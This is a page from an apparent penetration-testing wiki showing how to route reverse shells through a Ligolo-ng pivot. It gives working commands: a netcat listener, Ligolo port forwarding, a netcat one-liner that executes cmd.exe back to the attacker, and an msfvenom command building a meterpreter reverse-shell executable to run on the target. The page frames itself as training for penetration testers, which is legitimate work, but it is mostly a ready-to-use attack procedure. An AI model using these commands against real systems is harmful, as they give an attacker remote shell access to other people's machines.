Zero Day Archives
  • What is Zero Day Archives?
  • Contributors
  • Wireless Security
    • Intro to WiFi Pentesting
      • WEP Networks
      • WPS
      • WPA-PSK Networks
      • WPA & WPA2 PSK
      • WPA2 & WPA3 Enterprise Networks
      • WPA2 & WPA3-APLess
  • Reverse Engineering
    • Reverse Engineering
      • Introduction to Software Reverse Engineering
        • Introduction to Capture the Flag (CTF) Competitions
        • What are PE & Elf Binaries
        • Assembly Language for Beginner Reverse Engineers
        • Memory Registers for x86-64 (64-bit) and x86 (32-bit)
        • Reversing Tools: Command-Line Utilities for Binary Analysis
        • Reversing ELF Binaries: Techniques and Tools
      • Disassembly & Debugging
        • GDB for Reverse Engineering
        • RADARE2 for Reverse Engineering
        • GHIDRA for Reverse Engineering
        • IDA Pro for Reverse Engineering
      • Binary Exploitation
        • Buffer Overflows
          • What are Buffer Overflows and Stack Protections?
          • Commonly Exploited C Functions and Their Secure Alternatives
          • Basic Buffer Overflow in x86-64 Using GDB
        • Cryptography
          • Understanding Ciphers and Identifying Common Patterns
          • Teaching XOR Operations in Binary Exploitation
        • Return Oriented Programming (ROP)
          • Practical Guide to Exploring and Identifying Return-Oriented Programming (ROP)
        • Cracking and Patching Binaries
          • Tactics, Tools, and Procedures for Cracking and Patching Binaries
        • Ret2Win Challenges
  • Malware Analysis
    • Malware Analysis
      • Static Analysis
  • Transporting Files to/from Victims
    • Transferring Files to/from High Value Targets
      • Linux
      • Windows
      • CrackMapExec (NetExec)
  • Penetration Testing against GIT Remote Repositories
    • Targeting GIT Repositories
      • Attacking GIT
  • Network Pivoting, Port Forwarding, and Tunneling
    • Pivoting
      • Ligolo-ng
        • Basic Pivoting
        • Setup Reverse Shells through Pivot
        • Transferring Files through Pivot
      • Pivoting: Using Remote Desktop
      • ProxyChains
      • Metasploit
    • SSH Tunneling
      • SSH Local Port Forwarding
      • SSH Dynamic Port Forwarding
      • Sshuttle over SSH
    • Port Fowarding
      • Chisel Port Forwarding
      • NetSH for Port Forwarding
      • Plink for Port Forwarding
      • SoCat
      • Metasploit: Port Forwarding
  • Anti-Virus Evasion
    • Anti-Virus Evasion
      • Evasion with Metasploit
      • Evasion wtih Shellter
      • Evasion with Virus Total
  • Public Exploit Research
    • Online Exploit Research & Methods
  • Password Attacks
    • Password Attacks
      • Identifying Hashes
        • Hash Identifier Tools
      • John The Ripper
        • Cracking Passwords with John
        • Convert to Hashes with John
        • NTLM vs NTLMv2 Hashes + CrackMapExec
      • Hashcat
        • Cracking Passwords with Hashcat
      • Hydra
        • Hydra for Network Services
        • Hydra for Web Services
      • Mutating Wordlists for John & Hashcat
        • Mutating Wordlists
  • Digital Forensics & Incident Response (DFIR)
    • Digital Forensics
  • Data Science
    • Data Science/AI
  • Software Defined Radio (SDR)
    • Software Defined Radio
  • Embedded Systems Programming
    • Field Programmable Gate Arrays (FPGAs)
  • Other Resources
    • Resources for Hackers
Powered by GitBook
On this page
  1. Network Pivoting, Port Forwarding, and Tunneling
  2. Pivoting
  3. Ligolo-ng

Setup Reverse Shells through Pivot

Here's how you can set up a netcat listener and pivot connections using Netcat and Metasploit:

Step 1: Set Up the Netcat Listener

First, you need to set up a Netcat listener on your local machine (Kali) to accept incoming connections.

  1. Start Netcat Listener:

    nc -nvlp 2222

    This command will listen on port 2222 on your local machine.

Step 2: Set Up the Listener Add Command

Now, configure the listener to forward any incoming connections on a different port (e.g., port 1234) to your local machine's port 2222.

  1. Listener Add Command:

    listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:2222

    • This command tells the listener to forward any incoming connections that hit port 1234 on your pivot machine to your localhost (127.0.0.1) on port 2222.

    You should see a message confirming the listener is set up and active.

Step 3: Verify the Listener is Active

You can check if the listener is active by running the following command:

  1. Check Active Listeners:

    listener_list

    This will show you the listeners that are currently active. You should see the listener set up in the previous step.

Step 4: Testing the Listener with Netcat

Now, to test that the listener works, you can attempt a connection from a remote machine (e.g., client01) using Netcat:

  1. Connect Back to Listener on your pivot machine: On the pivot machine, use the following Netcat command to connect back to your machine on port 1234, which will forward the traffic to localhost:2222.

    nc.exe -nv 10.10.120.131 1234 -e cmd.exe

    • 10.10.120.131 is the IP address of your pivot machine.

    • Port 1234 is where the traffic will be forwarded to localhost:2222.

    • The -e cmd.exe option will execute the cmd.exe on the target machine, providing you with a shell.

Step 5: Using Metasploit for Reverse Shell

To automate this process or use a reverse shell, you can use Metasploit to generate a payload that will connect back to your pivot machine's IP.

  1. Generate a Reverse Shell with Metasploit:

    msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.76.14 LPORT=1234 -f exe -o shell2.exe

    • LHOST=172.16.76.14 is the IP address of your pivot machine.

    • LPORT=1234 is the port you're forwarding traffic to.

    • -o shell2.exe specifies the output filename.

  2. Execute the Payload: After transferring and executing shell2.exe on the target machine, it will establish a reverse shell connection back to your listener on port 1234, which is forwarded to localhost:2222.

PreviousBasic PivotingNextTransferring Files through Pivot

Last updated 19 days ago